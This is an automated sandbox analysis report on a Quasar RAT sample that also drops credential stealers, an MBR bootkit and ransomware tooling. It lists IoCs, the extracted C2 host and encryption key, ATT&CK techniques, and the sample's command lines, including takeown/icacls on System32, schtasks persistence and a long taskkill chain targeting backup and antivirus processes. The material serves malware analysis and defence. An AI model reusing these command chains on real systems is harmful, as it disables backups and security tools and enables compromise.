quasar | 65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496

Resubmissions

28-02-2024 09:17

240228-k84xnaga5v 10

15-01-2024 07:41

240115-jh96bachc6 10

23-10-2023 07:49

231023-jn2q5agh62 10

17-10-2023 15:34

231017-szv76ada4t 10

Analysis

max time kernel
208s
max time network
210s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-02-2024 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vcac.exe
Size

41.6MB
MD5

0fb2af6afdbdaf9206a5505264f0bf71
SHA1

2a6a04694b83ac2d4d0c207951fc838072804b6a
SHA256

65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496
SHA512

f5edebf5a9d4d0d4e5c11285febace0c65cf998573267da4016af563920de76f970b41661e2888de06cae737b56bc31a19c7f588993fc3e16828cb99c96ef7d7
SSDEEP

393216:Q/joxiIE7YoPQtsTTp7Lk3meBcGfd0vYM2krlFk1mX1eq44:Ijoe7rPQts/RLaT5F0vYvXFg

Score

10^/10

quasar user bootkit collection discovery evasion exploit persistence pyinstaller ransomware spyware stealer trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes

encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
install_name
Windows.exe
log_directory
Logs
reconnect_delay
1
startup_key
Discord.exe
subdirectory
System

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 5 IoCs

resource	yara_rule
behavioral1/memory/4840-1-0x00000000007D0000-0x000000000316A000-memory.dmp	family_quasar
behavioral1/files/0x000700000002325a-478.dat	family_quasar
behavioral1/files/0x000700000002325a-477.dat	family_quasar
behavioral1/files/0x000700000002325a-431.dat	family_quasar
behavioral1/memory/1692-520-0x0000000000120000-0x0000000000444000-memory.dmp	family_quasar

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	vcac.exe

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4908	netsh.exe
4164	netsh.exe
1624	netsh.exe
4292	netsh.exe
1032	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2500	takeown.exe
3728	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	vcac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe

Executes dropped EXE 11 IoCs

pid	Process
2908	lm.exe
3488	mbr.exe
4324	svchost.exe
4720	pass.exe
2780	steal.exe
1692	server.exe
764	taskkill.exe
4144	steal.exe
3904	LaZagne.exe
2508	LaZagne.exe
3768	LogonUI.exe

Loads dropped DLL 64 IoCs

pid	Process
2908	lm.exe
2908	lm.exe
4840	vcac.exe
4840	vcac.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
4144	steal.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2500	takeown.exe
3728	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-983155329-280873152-1838004294-1000\desktop.ini	vcac.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
120	discord.com
76	discord.com
109	discord.com
56	discord.com
60	discord.com
69	discord.com
112	discord.com
148	discord.com
149	discord.com
44	discord.com
47	discord.com
42	discord.com
61	discord.com
80	discord.com
84	discord.com
116	discord.com
145	discord.com
32	discord.com
37	discord.com
63	discord.com
67	discord.com
75	discord.com
126	discord.com
127	discord.com
128	discord.com
54	discord.com
59	discord.com
151	discord.com
157	discord.com
71	discord.com
118	discord.com
143	discord.com
40	discord.com
66	discord.com
72	discord.com
110	discord.com
124	discord.com
144	discord.com
35	discord.com
36	discord.com
131	discord.com
138	discord.com
152	discord.com
49	discord.com
129	discord.com
58	discord.com
65	discord.com
74	discord.com
111	discord.com
117	discord.com
46	discord.com
55	discord.com
73	discord.com
150	discord.com
45	discord.com
57	discord.com
139	discord.com
140	discord.com
48	discord.com
130	discord.com
142	discord.com
156	discord.com
41	discord.com
68	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
146	api.ipify.org
99	api.ipify.org
102	api.ipify.org
122	api.ipify.org
135	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	lm.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\LogonUI.exe	svchost.exe

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0008000000023259-424.dat	pyinstaller
behavioral1/files/0x0008000000023259-436.dat	pyinstaller
behavioral1/files/0x0008000000023259-435.dat	pyinstaller
behavioral1/files/0x0008000000023259-541.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4832	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4216	tasklist.exe

Kills process with taskkill 42 IoCs

evasion

pid	Process
3448	taskkill.exe
4960	taskkill.exe
3224	taskkill.exe
3984	taskkill.exe
3516	taskkill.exe
4708	taskkill.exe
4636	taskkill.exe
1704	taskkill.exe
4936	taskkill.exe
3800	taskkill.exe
3448	taskkill.exe
3700	taskkill.exe
764	taskkill.exe
2292	taskkill.exe
4796	taskkill.exe
4304	taskkill.exe
2224	taskkill.exe
3936	taskkill.exe
1820	taskkill.exe
4572	taskkill.exe
1432	taskkill.exe
2184	taskkill.exe
1660	taskkill.exe
3688	taskkill.exe
1356	taskkill.exe
3392	taskkill.exe
5004	taskkill.exe
3664	taskkill.exe
4764	taskkill.exe
1596	taskkill.exe
2732	taskkill.exe
3144	taskkill.exe
4440	taskkill.exe
1128	taskkill.exe
1972	taskkill.exe
4060	taskkill.exe
516	taskkill.exe
664	taskkill.exe
3664	taskkill.exe
1196	taskkill.exe
4700	taskkill.exe
3248	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3844	reg.exe
3444	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4720	pass.exe
4720	pass.exe
4720	pass.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
4840	vcac.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
2508	LaZagne.exe
4840	vcac.exe
2508	LaZagne.exe
2508	LaZagne.exe
4840	vcac.exe
4840	vcac.exe
2508	LaZagne.exe
2508	LaZagne.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1692	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4840	vcac.exe
Token: SeTakeOwnershipPrivilege	2500	takeown.exe
Token: SeDebugPrivilege	1128	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4768	WMIC.exe
Token: SeSecurityPrivilege	4768	WMIC.exe
Token: SeTakeOwnershipPrivilege	4768	WMIC.exe
Token: SeLoadDriverPrivilege	4768	WMIC.exe
Token: SeSystemProfilePrivilege	4768	WMIC.exe
Token: SeSystemtimePrivilege	4768	WMIC.exe
Token: SeProfSingleProcessPrivilege	4768	WMIC.exe
Token: SeIncBasePriorityPrivilege	4768	WMIC.exe
Token: SeCreatePagefilePrivilege	4768	WMIC.exe
Token: SeBackupPrivilege	4768	WMIC.exe
Token: SeRestorePrivilege	4768	WMIC.exe
Token: SeShutdownPrivilege	4768	WMIC.exe
Token: SeDebugPrivilege	4768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4768	WMIC.exe
Token: SeRemoteShutdownPrivilege	4768	WMIC.exe
Token: SeUndockPrivilege	4768	WMIC.exe
Token: SeManageVolumePrivilege	4768	WMIC.exe
Token: 33	4768	WMIC.exe
Token: 34	4768	WMIC.exe
Token: 35	4768	WMIC.exe
Token: 36	4768	WMIC.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4768	WMIC.exe
Token: SeSecurityPrivilege	4768	WMIC.exe
Token: SeTakeOwnershipPrivilege	4768	WMIC.exe
Token: SeLoadDriverPrivilege	4768	WMIC.exe
Token: SeSystemProfilePrivilege	4768	WMIC.exe
Token: SeSystemtimePrivilege	4768	WMIC.exe
Token: SeProfSingleProcessPrivilege	4768	WMIC.exe
Token: SeIncBasePriorityPrivilege	4768	WMIC.exe
Token: SeCreatePagefilePrivilege	4768	WMIC.exe
Token: SeBackupPrivilege	4768	WMIC.exe
Token: SeRestorePrivilege	4768	WMIC.exe
Token: SeShutdownPrivilege	4768	WMIC.exe
Token: SeDebugPrivilege	4768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4768	WMIC.exe
Token: SeRemoteShutdownPrivilege	4768	WMIC.exe
Token: SeUndockPrivilege	4768	WMIC.exe
Token: SeManageVolumePrivilege	4768	WMIC.exe
Token: 33	4768	WMIC.exe
Token: 34	4768	WMIC.exe
Token: 35	4768	WMIC.exe
Token: 36	4768	WMIC.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeBackupPrivilege	4468	vssvc.exe
Token: SeRestorePrivilege	4468	vssvc.exe
Token: SeAuditPrivilege	4468	vssvc.exe
Token: SeDebugPrivilege	3392	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeDebugPrivilege	4764	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	2732	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	3144	taskkill.exe
Token: SeDebugPrivilege	664	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe
4840	vcac.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1692	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4840 wrote to memory of 3708	4840	vcac.exe	93
PID 4840 wrote to memory of 3708	4840	vcac.exe	93
PID 4840 wrote to memory of 3708	4840	vcac.exe	93
PID 4840 wrote to memory of 2644	4840	vcac.exe	95
PID 4840 wrote to memory of 2644	4840	vcac.exe	95
PID 4840 wrote to memory of 2644	4840	vcac.exe	95
PID 2644 wrote to memory of 2908	2644	cmd.exe	97
PID 2644 wrote to memory of 2908	2644	cmd.exe	97
PID 2644 wrote to memory of 2908	2644	cmd.exe	97
PID 4840 wrote to memory of 3488	4840	vcac.exe	99
PID 4840 wrote to memory of 3488	4840	vcac.exe	99
PID 4840 wrote to memory of 3488	4840	vcac.exe	99
PID 4840 wrote to memory of 4324	4840	vcac.exe	100
PID 4840 wrote to memory of 4324	4840	vcac.exe	100
PID 3488 wrote to memory of 4832	3488	mbr.exe	101
PID 3488 wrote to memory of 4832	3488	mbr.exe	101
PID 3488 wrote to memory of 4832	3488	mbr.exe	101
PID 4324 wrote to memory of 2520	4324	svchost.exe	103
PID 4324 wrote to memory of 2520	4324	svchost.exe	103
PID 2520 wrote to memory of 2500	2520	cmd.exe	105
PID 2520 wrote to memory of 2500	2520	cmd.exe	105
PID 2520 wrote to memory of 3728	2520	cmd.exe	106
PID 2520 wrote to memory of 3728	2520	cmd.exe	106
PID 4840 wrote to memory of 1572	4840	vcac.exe	110
PID 4840 wrote to memory of 1572	4840	vcac.exe	110
PID 4840 wrote to memory of 1572	4840	vcac.exe	110
PID 4840 wrote to memory of 3768	4840	vcac.exe	112
PID 4840 wrote to memory of 3768	4840	vcac.exe	112
PID 4840 wrote to memory of 3768	4840	vcac.exe	112
PID 4840 wrote to memory of 1784	4840	vcac.exe	114
PID 4840 wrote to memory of 1784	4840	vcac.exe	114
PID 4840 wrote to memory of 1784	4840	vcac.exe	114
PID 1572 wrote to memory of 1128	1572	cmd.exe	116
PID 1572 wrote to memory of 1128	1572	cmd.exe	116
PID 1572 wrote to memory of 1128	1572	cmd.exe	116
PID 3768 wrote to memory of 1032	3768	cmd.exe	117
PID 3768 wrote to memory of 1032	3768	cmd.exe	117
PID 3768 wrote to memory of 1032	3768	cmd.exe	117
PID 1784 wrote to memory of 4768	1784	cmd.exe	118
PID 1784 wrote to memory of 4768	1784	cmd.exe	118
PID 1784 wrote to memory of 4768	1784	cmd.exe	118
PID 1572 wrote to memory of 2292	1572	cmd.exe	119
PID 1572 wrote to memory of 2292	1572	cmd.exe	119
PID 1572 wrote to memory of 2292	1572	cmd.exe	119
PID 1572 wrote to memory of 4796	1572	cmd.exe	121
PID 1572 wrote to memory of 4796	1572	cmd.exe	121
PID 1572 wrote to memory of 4796	1572	cmd.exe	121
PID 1572 wrote to memory of 3392	1572	cmd.exe	123
PID 1572 wrote to memory of 3392	1572	cmd.exe	123
PID 1572 wrote to memory of 3392	1572	cmd.exe	123
PID 3768 wrote to memory of 4908	3768	cmd.exe	124
PID 3768 wrote to memory of 4908	3768	cmd.exe	124
PID 3768 wrote to memory of 4908	3768	cmd.exe	124
PID 1572 wrote to memory of 1196	1572	cmd.exe	125
PID 1572 wrote to memory of 1196	1572	cmd.exe	125
PID 1572 wrote to memory of 1196	1572	cmd.exe	125
PID 1572 wrote to memory of 4304	1572	cmd.exe	126
PID 1572 wrote to memory of 4304	1572	cmd.exe	126
PID 1572 wrote to memory of 4304	1572	cmd.exe	126
PID 1572 wrote to memory of 1972	1572	cmd.exe	127
PID 1572 wrote to memory of 1972	1572	cmd.exe	127
PID 1572 wrote to memory of 1972	1572	cmd.exe	127
PID 3768 wrote to memory of 4164	3768	cmd.exe	128
PID 3768 wrote to memory of 4164	3768	cmd.exe	128

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

C:\Users\Admin\AppData\Local\Temp\vcac.exe
"C:\Users\Admin\AppData\Local\Temp\vcac.exe"
1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
  2⤵
  PID:3708
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Users\Admin\AppData\Roaming\lm.exe
    lm.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    PID:2908
- C:\Users\Admin\AppData\Roaming\mbr.exe
  "C:\Users\Admin\AppData\Roaming\mbr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory
  PID:3488
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4832
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2500
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32 /grant "Admin:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:4440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:3800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:3448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:3664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:3688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Kills process with taskkill
    PID:4960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:5004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:4636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:3448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:3224
- - C:\Windows\SysWOW64\taskkill.exe
